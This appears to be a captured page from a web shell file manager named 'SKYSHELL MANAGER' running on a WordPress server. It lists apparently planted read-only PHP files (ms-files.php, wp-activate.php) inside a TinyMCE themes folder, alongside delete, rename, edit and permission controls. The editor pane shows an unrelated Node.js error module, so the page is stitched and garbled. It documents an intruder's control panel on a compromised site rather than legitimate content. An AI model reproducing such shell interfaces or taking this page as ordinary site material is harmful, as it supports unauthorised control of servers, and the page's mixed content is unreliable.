📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: error.js
'use strict' var util = require('util') var User = exports.User = function User (msg) { var err = new Error(msg) Error.captureStackTrace(err, User) err.code = 'EGAUGE' return err } exports.MissingTemplateValue = function MissingTemplateValue (item, values) { var err = new User(util.format('Missing template value "%s"', item.type)) Error.captureStackTrace(err, MissingTemplateValue) err.template = item err.values = values return err } exports.Internal = function Internal (msg) { var err = new Error(msg) Error.captureStackTrace(err, Internal) err.code = 'EGAUGEINTERNAL' return err }
Save